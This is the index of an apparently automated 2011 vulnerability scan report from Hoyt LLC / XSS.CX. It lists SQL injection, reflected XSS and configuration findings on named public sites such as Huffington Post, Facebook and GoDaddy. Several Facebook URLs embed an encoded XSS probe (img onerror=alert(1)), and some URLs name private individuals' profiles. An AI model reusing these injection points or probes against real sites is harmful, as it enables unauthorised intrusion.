XSS, SQL Injection, HTTP Header Injection, Insecure Configuration, Information Disclosure, GHDB DORK Report 05052011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Thu May 05 13:09:24 CDT 2011.



1. SQL injection

1.1. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]

1.2. http://www.huffingtonpost.com/threeup.php [v parameter]

2. Cross-site scripting (reflected)

2.1. http://www.aolnews.com/category/goodnews/ [REST URL parameter 2]

2.2. http://www.bankrate.com/funnel/mortgages/ [name of an arbitrarily supplied request parameter]

2.3. http://www.citysbest.com/ [icid parameter]

2.4. http://www.citysbest.com/ [name of an arbitrarily supplied request parameter]

2.5. http://www.citysbest.com/traffic/ [REST URL parameter 1]

2.6. http://www.citysbest.com/traffic/ [REST URL parameter 1]

2.7. http://www.dailyfinance.com/markets/mostactives [REST URL parameter 2]

2.8. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [REST URL parameter 2]

2.9. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [name of an arbitrarily supplied request parameter]

2.10. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [REST URL parameter 3]

2.11. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [name of an arbitrarily supplied request parameter]

2.12. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [REST URL parameter 3]

2.13. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [name of an arbitrarily supplied request parameter]

2.14. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [REST URL parameter 3]

2.15. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [name of an arbitrarily supplied request parameter]

2.16. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

2.17. http://www.huffingtonpost.com/ [icid parameter]

2.18. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]

2.19. http://www.huffingtonpost.com/2011/05/02/ [name of an arbitrarily supplied request parameter]

2.20. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html [name of an arbitrarily supplied request parameter]

2.21. http://www.huffingtonpost.com/2011/05/04/ [name of an arbitrarily supplied request parameter]

2.22. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html [name of an arbitrarily supplied request parameter]

2.23. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html [name of an arbitrarily supplied request parameter]

2.24. http://www.huffingtonpost.com/ads/check_flights.php [name of an arbitrarily supplied request parameter]

2.25. http://www.huffingtonpost.com/ads/check_flights.php [spot parameter]

2.26. http://www.huffingtonpost.com/advertise/ [name of an arbitrarily supplied request parameter]

2.27. http://www.huffingtonpost.com/badge/badges_json_v2.php [cb parameter]

2.28. http://www.huffingtonpost.com/badge/badges_json_v2.php [gn parameter]

2.29. http://www.huffingtonpost.com/badge/badges_json_v2.php [sn parameter]

2.30. http://www.huffingtonpost.com/permalink-tracker.html [vertical parameter]

2.31. http://www.huffingtonpost.com/users/logout/ [name of an arbitrarily supplied request parameter]

2.32. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 1]

2.33. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 2]

2.34. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]

2.35. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]

2.36. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]

2.37. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]

2.38. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]

2.39. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]

2.40. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]

2.41. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]

2.42. http://www.moviefone.com/ [name of an arbitrarily supplied request parameter]

2.43. http://www.pageflakes.com/subscribe.aspx [REST URL parameter 1]

2.44. http://www.pageflakes.com/subscribe.aspx [name of an arbitrarily supplied request parameter]

2.45. http://www.popeater.com/ [name of an arbitrarily supplied request parameter]

2.46. http://www.tuaw.com/hub/app-reviews [name of an arbitrarily supplied request parameter]

2.47. https://www.godaddy.com/gdshop/hosting/landing.asp [User-Agent HTTP header]

2.48. https://www.godaddy.com/gdshop/registrar/search.asp [User-Agent HTTP header]

2.49. https://www.godaddy.com/gdshop/website.asp [User-Agent HTTP header]

2.50. http://www.aol.com/ [dlact cookie]

2.51. http://www.aol.com/ [rrpmo1 cookie]

2.52. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 [REST URL parameter 3]

2.53. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783 [REST URL parameter 3]

2.54. http://www.facebook.com/people/Bucky-Jordan/100000824820783 [REST URL parameter 3]

2.55. http://www.facebook.com/people/Bucky-Jordan/100000824820783/x22 [REST URL parameter 4]

3. Flash cross-domain policy

3.1. http://www.aolcdn.com/crossdomain.xml

3.2. http://www.everydayhealth.com/crossdomain.xml

3.3. http://www.huffingtonpost.com/crossdomain.xml

3.4. http://www.mapquest.com/crossdomain.xml

3.5. http://xml.truveo.com/crossdomain.xml

3.6. http://www.aol.com/crossdomain.xml

3.7. http://www.aolnews.com/crossdomain.xml

3.8. http://www.apple.com/crossdomain.xml

3.9. http://www.blogsmithmedia.com/crossdomain.xml

3.10. http://www.citysbest.com/crossdomain.xml

3.11. http://www.dailyfinance.com/crossdomain.xml

3.12. http://www.dooce.com/crossdomain.xml

3.13. http://www.facebook.com/crossdomain.xml

3.14. https://www.facebook.com/crossdomain.xml

3.15. http://www.ft.com/crossdomain.xml

3.16. https://www.godaddy.com/crossdomain.xml

3.17. http://www.ibm.com/crossdomain.xml

3.18. http://www.marketwatch.com/crossdomain.xml

3.19. http://www.mmafighting.com/crossdomain.xml

3.20. http://www.moviefone.com/crossdomain.xml

3.21. http://www.netvibes.com/crossdomain.xml

3.22. http://www.pageflakes.com/crossdomain.xml

3.23. http://www.popeater.com/crossdomain.xml

3.24. http://www.realtytrac.com/crossdomain.xml

3.25. http://www.tuaw.com/crossdomain.xml

3.26. http://www.truveo.com/crossdomain.xml

4. Silverlight cross-domain policy

5. Cleartext submission of password

5.1. http://www.facebook.com/

5.2. http://www.facebook.com/r.php

5.3. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

5.4. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

6. SSL cookie without secure flag set

6.1. https://www.fightmagazine.com/mma-magazine/subscribe.asp

6.2. https://www.godaddy.com/

6.3. https://www.godaddy.com/domains/search.aspx

6.4. https://www.facebook.com/

6.5. https://www.facebook.com/ajax/intl/language_dialog.php

6.6. https://www.facebook.com/h02332

6.7. https://www.facebook.com/h02332

6.8. https://www.facebook.com/h02332

6.9. https://www.facebook.com/help/contact.php

6.10. https://www.facebook.com/login.php

6.11. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

6.12. https://www.facebook.com/pages/create.php

6.13. https://www.facebook.com/r.php

6.14. https://www.facebook.com/recover.php

6.15. https://www.godaddy.com/gdshop/hosting/landing.asp

6.16. https://www.godaddy.com/gdshop/registrar/search.asp

6.17. https://www.godaddy.com/gdshop/website.asp

7. Session token in URL

8. SSL certificate

8.1. https://www.facebook.com/

8.2. https://www.fightmagazine.com/

8.3. https://www.godaddy.com/

8.4. https://www.neodata.com/

9. ASP.NET ViewState without MAC enabled

9.1. http://www.bankrate.com/funnel/mortgages/

9.2. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

9.3. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

9.4. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

9.5. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

10. Cookie scoped to parent domain

10.1. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

10.2. http://www.mapquest.com/

10.3. http://www.mapquest.com/_svc/ad/getads

10.4. http://www.mapquest.com/_svc/apixel

10.5. http://www.mapquest.com/_svc/publishing/promo

10.6. http://www.mapquest.com/_svc/searchio

10.7. http://www.mapquest.com/cdn/_uac/adpage.htm

10.8. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

10.9. http://www.mapquest.com/icons/stop.png

10.10. http://www.facebook.com/

10.11. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

10.12. http://www.facebook.com/10000082482078341583

10.13. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

10.14. http://www.facebook.com/1242845259

10.15. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

10.16. http://www.facebook.com/2008/fbml

10.17. http://www.facebook.com/AOLrealestate

10.18. http://www.facebook.com/BPAmerica

10.19. http://www.facebook.com/DailyFinance

10.20. http://www.facebook.com/HockeyKen

10.21. http://www.facebook.com/KickIceForever

10.22. http://www.facebook.com/LadyBonesie

10.23. http://www.facebook.com/Loizza

10.24. http://www.facebook.com/aim

10.25. http://www.facebook.com/ajax/intl/language_dialog.php

10.26. http://www.facebook.com/ajax/reg_birthday_help.php

10.27. http://www.facebook.com/ajax/register/logging.php

10.28. http://www.facebook.com/aol

10.29. http://www.facebook.com/aolradio

10.30. http://www.facebook.com/badges

10.31. http://www.facebook.com/burkerkink

10.32. http://www.facebook.com/campaign/landing.php

10.33. http://www.facebook.com/careers/

10.34. http://www.facebook.com/deedee.perez1

10.35. http://www.facebook.com/directory/pages/

10.36. http://www.facebook.com/directory/people/

10.37. http://www.facebook.com/facebook

10.38. http://www.facebook.com/fayse

10.39. http://www.facebook.com/find-friends

10.40. http://www.facebook.com/find-friends

10.41. http://www.facebook.com/gale.l.schenk

10.42. http://www.facebook.com/help/

10.43. http://www.facebook.com/help/

10.44. http://www.facebook.com/home.php

10.45. http://www.facebook.com/izaOllie

10.46. http://www.facebook.com/jezzas

10.47. http://www.facebook.com/kimberly.christ

10.48. http://www.facebook.com/ladonna.lokey

10.49. http://www.facebook.com/lakendra.roberts

10.50. http://www.facebook.com/login.php

10.51. http://www.facebook.com/login.php

10.52. http://www.facebook.com/mapquest

10.53. http://www.facebook.com/matthew.oliveira2

10.54. http://www.facebook.com/mmafighting

10.55. http://www.facebook.com/mobile

10.56. http://www.facebook.com/mobile/

10.57. http://www.facebook.com/mobile/

10.58. http://www.facebook.com/pages/Barnesville/115038011847083

10.59. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820

10.60. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478

10.61. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059

10.62. http://www.facebook.com/pages/Editor-in-Chief/137829579583400

10.63. http://www.facebook.com/pages/Gilco-Corporation/109823499042436

10.64. http://www.facebook.com/pages/HMFIC/149403761740008

10.65. http://www.facebook.com/pages/HuffPost-World/70242384902

10.66. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312

10.67. http://www.facebook.com/pages/Merchandiser/123981654314779

10.68. http://www.facebook.com/pages/New-Haven-College/130105783687523

10.69. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674

10.70. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680

10.71. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

10.72. http://www.facebook.com/pages/Sporting-News/104068362964496

10.73. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520

10.74. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

10.75. http://www.facebook.com/pages/create.php

10.76. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580

10.77. http://www.facebook.com/patroyo

10.78. http://www.facebook.com/people/Alexander-Bucky%20-Jordan/1242845259

10.79. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

10.80. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

10.81. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783

10.82. http://www.facebook.com/people/Bucky-Jordan/100000824820783

10.83. http://www.facebook.com/policy.php

10.84. http://www.facebook.com/privacy/explanation.php

10.85. http://www.facebook.com/profile.php

10.86. http://www.facebook.com/r.php

10.87. http://www.facebook.com/recover.php

10.88. http://www.facebook.com/robynalys

10.89. http://www.facebook.com/share.php

10.90. http://www.facebook.com/sharer.php

10.91. http://www.facebook.com/skdarealist

10.92. http://www.facebook.com/sportingnews

10.93. http://www.facebook.com/stefanoboscolomarchi

10.94. http://www.facebook.com/techcrunch

10.95. http://www.facebook.com/terms.php

10.96. http://www.facebook.com/theteebers

10.97. http://www.facebook.com/wmoppert

10.98. https://www.facebook.com/

10.99. https://www.facebook.com/ajax/intl/language_dialog.php

10.100. https://www.facebook.com/h02332

10.101. https://www.facebook.com/h02332

10.102. https://www.facebook.com/h02332

10.103. https://www.facebook.com/help/contact.php

10.104. https://www.facebook.com/login.php

10.105. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

10.106. https://www.facebook.com/pages/create.php

10.107. https://www.facebook.com/r.php

10.108. https://www.facebook.com/recover.php

10.109. https://www.godaddy.com/

10.110. https://www.godaddy.com/domains/search.aspx

10.111. https://www.godaddy.com/gdshop/hosting/landing.asp

10.112. https://www.godaddy.com/gdshop/registrar/search.asp

10.113. https://www.godaddy.com/gdshop/website.asp

10.114. http://www.google.com/finance

10.115. http://www.huffingtonpost.com/users/logout/

10.116. http://www.marketwatch.com/News/Story/Story.aspx

10.117. http://www.moviefone.com/

10.118. http://www.truveo.com/

10.119. http://www.truveo.com/search

11. Cookie without HttpOnly flag set

11.1. http://www.aol.com/

11.2. http://www.aol.com/ajax.jsp

11.3. http://www.crunchboard.com/opening/detailjob.php

11.4. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

11.5. https://www.fightmagazine.com/mma-magazine/subscribe.asp

11.6. https://www.godaddy.com/gdshop/catalog.asp

11.7. https://www.godaddy.com/gdshop/hosting/landing.asp

11.8. https://www.godaddy.com/gdshop/registrar/search.asp

11.9. https://www.godaddy.com/gdshop/website.asp

11.10. http://www.mapquest.com/

11.11. http://www.mapquest.com/_svc/ad/getads

11.12. http://www.mapquest.com/_svc/apixel

11.13. http://www.mapquest.com/_svc/publishing/promo

11.14. http://www.mapquest.com/_svc/searchio

11.15. http://www.mapquest.com/cdn/_uac/adpage.htm

11.16. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

11.17. http://www.mapquest.com/icons/stop.png

11.18. http://www.mmawarehouse.com/

11.19. http://www.mmawarehouse.com/Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm

11.20. http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm

11.21. http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm

11.22. http://www.mmawarehouse.com/FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm

11.23. http://www.mmawarehouse.com/FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm

11.24. http://www.mmawarehouse.com/Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm

11.25. http://www.mmawarehouse.com/Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm

11.26. http://www.truveo.com/

11.27. http://www.truveo.com/search

11.28. http://yellowpages.aol.com/

11.29. http://www.citysbest.com/

11.30. http://www.dailyfinance.com/

11.31. http://www.dailyfinance.com/

11.32. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

11.33. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

11.34. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

11.35. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

11.36. http://www.facebook.com/

11.37. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

11.38. http://www.facebook.com/10000082482078341583

11.39. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

11.40. http://www.facebook.com/1242845259

11.41. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

11.42. http://www.facebook.com/2008/fbml

11.43. http://www.facebook.com/HockeyKen

11.44. http://www.facebook.com/KickIceForever

11.45. http://www.facebook.com/Loizza

11.46. http://www.facebook.com/burkerkink

11.47. http://www.facebook.com/careers/

11.48. http://www.facebook.com/deedee.perez1

11.49. http://www.facebook.com/directory/pages/

11.50. http://www.facebook.com/directory/people/

11.51. http://www.facebook.com/fayse

11.52. http://www.facebook.com/find-friends

11.53. http://www.facebook.com/gale.l.schenk

11.54. http://www.facebook.com/help/

11.55. http://www.facebook.com/izaOllie

11.56. http://www.facebook.com/jezzas

11.57. http://www.facebook.com/kimberly.christ

11.58. http://www.facebook.com/ladonna.lokey

11.59. http://www.facebook.com/lakendra.roberts

11.60. http://www.facebook.com/login.php

11.61. http://www.facebook.com/matthew.oliveira2

11.62. http://www.facebook.com/mobile/

11.63. http://www.facebook.com/pages/create.php

11.64. http://www.facebook.com/patroyo

11.65. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

11.66. http://www.facebook.com/people/Bucky-Jordan/100000824820783

11.67. http://www.facebook.com/privacy/explanation.php

11.68. http://www.facebook.com/robynalys

11.69. http://www.facebook.com/share.php

11.70. http://www.facebook.com/sharer.php

11.71. http://www.facebook.com/skdarealist

11.72. http://www.facebook.com/stefanoboscolomarchi

11.73. http://www.facebook.com/theteebers

11.74. http://www.facebook.com/wmoppert

11.75. https://www.facebook.com/

11.76. https://www.facebook.com/h02332

11.77. https://www.facebook.com/h02332

11.78. https://www.facebook.com/help/contact.php

11.79. https://www.facebook.com/login.php

11.80. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

11.81. https://www.facebook.com/pages/create.php

11.82. https://www.facebook.com/recover.php

11.83. https://www.godaddy.com/

11.84. https://www.godaddy.com/domains/search.aspx

11.85. http://www.google.com/finance

11.86. http://www.huffingtonpost.com/include/geopromo.php

11.87. http://www.huffingtonpost.com/users/logout/

11.88. http://www.mapquest.com/directions

11.89. http://www.mapquest.com/maps

11.90. http://www.mapquest.com/routeplanner

11.91. http://www.marketwatch.com/News/Story/Story.aspx

11.92. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

11.93. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

11.94. http://www.moviefone.com/

11.95. http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

11.96. http://www.pageflakes.com/subscribe.aspx

11.97. http://www.popeater.com/

11.98. http://www.tuaw.com/hub/app-reviews

12. Password field with autocomplete enabled

12.1. http://www.facebook.com/

12.2. http://www.facebook.com/

12.3. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

12.4. http://www.facebook.com/10000082482078341583

12.5. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

12.6. http://www.facebook.com/1242845259

12.7. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

12.8. http://www.facebook.com/2008/fbml

12.9. http://www.facebook.com/AOLrealestate

12.10. http://www.facebook.com/BPAmerica

12.11. http://www.facebook.com/DailyFinance

12.12. http://www.facebook.com/HockeyKen

12.13. http://www.facebook.com/KickIceForever

12.14. http://www.facebook.com/LadyBonesie

12.15. http://www.facebook.com/Loizza

12.16. http://www.facebook.com/aim

12.17. http://www.facebook.com/ajax/intl/language_dialog.php

12.18. http://www.facebook.com/aol

12.19. http://www.facebook.com/aolradio

12.20. http://www.facebook.com/burkerkink

12.21. http://www.facebook.com/careers/

12.22. http://www.facebook.com/deedee.perez1

12.23. http://www.facebook.com/directory/pages/

12.24. http://www.facebook.com/directory/people/

12.25. http://www.facebook.com/facebook

12.26. http://www.facebook.com/fayse

12.27. http://www.facebook.com/find-friends

12.28. http://www.facebook.com/gale.l.schenk

12.29. http://www.facebook.com/help/

12.30. http://www.facebook.com/izaOllie

12.31. http://www.facebook.com/jezzas

12.32. http://www.facebook.com/kimberly.christ

12.33. http://www.facebook.com/ladonna.lokey

12.34. http://www.facebook.com/lakendra.roberts

12.35. http://www.facebook.com/login.php

12.36. http://www.facebook.com/matthew.oliveira2

12.37. http://www.facebook.com/mmafighting

12.38. http://www.facebook.com/mobile/

12.39. http://www.facebook.com/pages/Barnesville/115038011847083

12.40. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820

12.41. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478

12.42. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059

12.43. http://www.facebook.com/pages/Editor-in-Chief/137829579583400

12.44. http://www.facebook.com/pages/Gilco-Corporation/109823499042436

12.45. http://www.facebook.com/pages/HMFIC/149403761740008

12.46. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312

12.47. http://www.facebook.com/pages/Merchandiser/123981654314779

12.48. http://www.facebook.com/pages/New-Haven-College/130105783687523

12.49. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674

12.50. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680

12.51. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

12.52. http://www.facebook.com/pages/Sporting-News/104068362964496

12.53. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520

12.54. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

12.55. http://www.facebook.com/pages/create.php

12.56. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580

12.57. http://www.facebook.com/patroyo

12.58. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

12.59. http://www.facebook.com/people/Bucky-Jordan/100000824820783

12.60. http://www.facebook.com/plugins/facepile.php

12.61. http://www.facebook.com/plugins/likebox.php

12.62. http://www.facebook.com/policy.php

12.63. http://www.facebook.com/privacy/explanation.php

12.64. http://www.facebook.com/r.php

12.65. http://www.facebook.com/r.php

12.66. http://www.facebook.com/r.php

12.67. http://www.facebook.com/r.php

12.68. http://www.facebook.com/robynalys

12.69. http://www.facebook.com/share.php

12.70. http://www.facebook.com/sharer.php

12.71. http://www.facebook.com/skdarealist

12.72. http://www.facebook.com/sportingnews

12.73. http://www.facebook.com/stefanoboscolomarchi

12.74. http://www.facebook.com/techcrunch

12.75. http://www.facebook.com/terms.php

12.76. http://www.facebook.com/theteebers

12.77. http://www.facebook.com/wmoppert

12.78. https://www.facebook.com/

12.79. https://www.facebook.com/

12.80. https://www.facebook.com/ajax/intl/language_dialog.php

12.81. https://www.facebook.com/h02332

12.82. https://www.facebook.com/help/contact.php

12.83. https://www.facebook.com/login.php

12.84. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

12.85. https://www.facebook.com/pages/create.php

12.86. https://www.facebook.com/r.php

12.87. https://www.facebook.com/r.php

12.88. https://www.facebook.com/r.php

12.89. https://www.facebook.com/recover.php

12.90. https://www.godaddy.com/

12.91. https://www.godaddy.com/domains/search.aspx

12.92. https://www.godaddy.com/gdshop/hosting/landing.asp

12.93. http://www.marketwatch.com/News/Story/Story.aspx

12.94. http://www.marketwatch.com/News/Story/Story.aspx

12.95. http://www.marketwatch.com/News/Story/Story.aspx

12.96. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

12.97. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

12.98. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

13. ASP.NET debugging enabled

13.1. http://www.eyewonderlabs.com/Default.aspx

13.2. http://www.pageflakes.com/Default.aspx

14. Referer-dependent response

14.1. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

14.2. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

14.3. http://www.facebook.com/login.php

14.4. http://www.facebook.com/plugins/activity.php

14.5. http://www.facebook.com/plugins/like.php

14.6. http://www.facebook.com/plugins/likebox.php

14.7. http://www.facebook.com/plugins/recommendations.php

14.8. http://www.facebook.com/policy.php

14.9. https://www.facebook.com/

14.10. https://www.facebook.com/h02332

14.11. https://www.facebook.com/help/contact.php

14.12. http://www.huffingtonpost.com/

14.13. http://www.tuaw.com/hub/app-reviews

15. Cross-domain POST

15.1. http://www.dailyfinance.com/

15.2. http://www.dailyfinance.com/markets/mostactives

15.3. http://www.lakewoodbeacon.org/

16. Cross-domain Referer leakage

16.1. http://www.aol.com/ajax.jsp

16.2. http://www.aol.com/ajax.jsp

16.3. http://www.aol.com/ajax.jsp

16.4. http://www.aol.com/ajax.jsp

16.5. http://www.aol.com/ajax.jsp

16.6. http://www.aol.com/ajax.jsp

16.7. http://www.aol.com/ajax.jsp

16.8. http://www.aol.com/ajax.jsp

16.9. http://www.aol.com/ajax.jsp

16.10. http://www.aol.com/ajax.jsp

16.11. http://www.aol.com/ajax.jsp

16.12. http://www.aol.com/ajax.jsp

16.13. http://www.aol.com/ajax.jsp

16.14. http://www.aol.com/ajax.jsp

16.15. http://www.aol.com/ajax.jsp

16.16. http://www.aol.com/ajax.jsp

16.17. http://www.aol.com/ajax.jsp

16.18. http://www.aol.com/ajax.jsp

16.19. http://www.aol.com/ajax.jsp

16.20. http://www.aol.com/ajax.jsp

16.21. http://www.aol.com/ajax.jsp

16.22. http://www.aol.com/ajax.jsp

16.23. http://www.aol.com/ajax.jsp

16.24. http://www.aol.com/ajax.jsp

16.25. http://www.apple.com/itunes/affiliates/download/

16.26. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js

16.27. http://www.blogsmithmedia.com/www.dailyfinance.com/include/dailyfinance.js

16.28. http://www.citysbest.com/

16.29. http://www.dailyfinance.com/

16.30. http://www.facebook.com/BPAmerica

16.31. http://www.facebook.com/ajax/intl/language_dialog.php

16.32. http://www.facebook.com/careers/

16.33. http://www.facebook.com/find-friends

16.34. http://www.facebook.com/find-friends

16.35. http://www.facebook.com/help/

16.36. http://www.facebook.com/help/

16.37. http://www.facebook.com/help/

16.38. http://www.facebook.com/login.php

16.39. http://www.facebook.com/mobile/

16.40. http://www.facebook.com/mobile/

16.41. http://www.facebook.com/pages/create.php

16.42. http://www.facebook.com/plugins/activity.php

16.43. http://www.facebook.com/plugins/activity.php

16.44. http://www.facebook.com/plugins/activity.php

16.45. http://www.facebook.com/plugins/activity.php

16.46. http://www.facebook.com/plugins/comments.php

16.47. http://www.facebook.com/plugins/comments.php

16.48. http://www.facebook.com/plugins/comments.php

16.49. http://www.facebook.com/plugins/facepile.php

16.50. http://www.facebook.com/plugins/like.php

16.51. http://www.facebook.com/plugins/like.php

16.52. http://www.facebook.com/plugins/likebox.php

16.53. http://www.facebook.com/plugins/likebox.php

16.54. http://www.facebook.com/plugins/likebox.php

16.55. http://www.facebook.com/plugins/likebox.php

16.56. http://www.facebook.com/plugins/likebox.php

16.57. http://www.facebook.com/plugins/likebox.php

16.58. http://www.facebook.com/plugins/likebox.php

16.59. http://www.facebook.com/plugins/likebox.php

16.60. http://www.facebook.com/plugins/likebox.php

16.61. http://www.facebook.com/plugins/likebox.php

16.62. http://www.facebook.com/plugins/likebox.php

16.63. http://www.facebook.com/plugins/likebox.php

16.64. http://www.facebook.com/plugins/likebox.php

16.65. http://www.facebook.com/plugins/likebox.php

16.66. http://www.facebook.com/plugins/likebox.php

16.67. http://www.facebook.com/plugins/likebox.php

16.68. http://www.facebook.com/plugins/recommendations.php

16.69. http://www.facebook.com/plugins/recommendations.php

16.70. http://www.facebook.com/plugins/recommendations.php

16.71. http://www.facebook.com/plugins/send.php

16.72. http://www.facebook.com/plugins/send.php

16.73. http://www.facebook.com/r.php

16.74. http://www.facebook.com/r.php

16.75. http://www.facebook.com/share.php

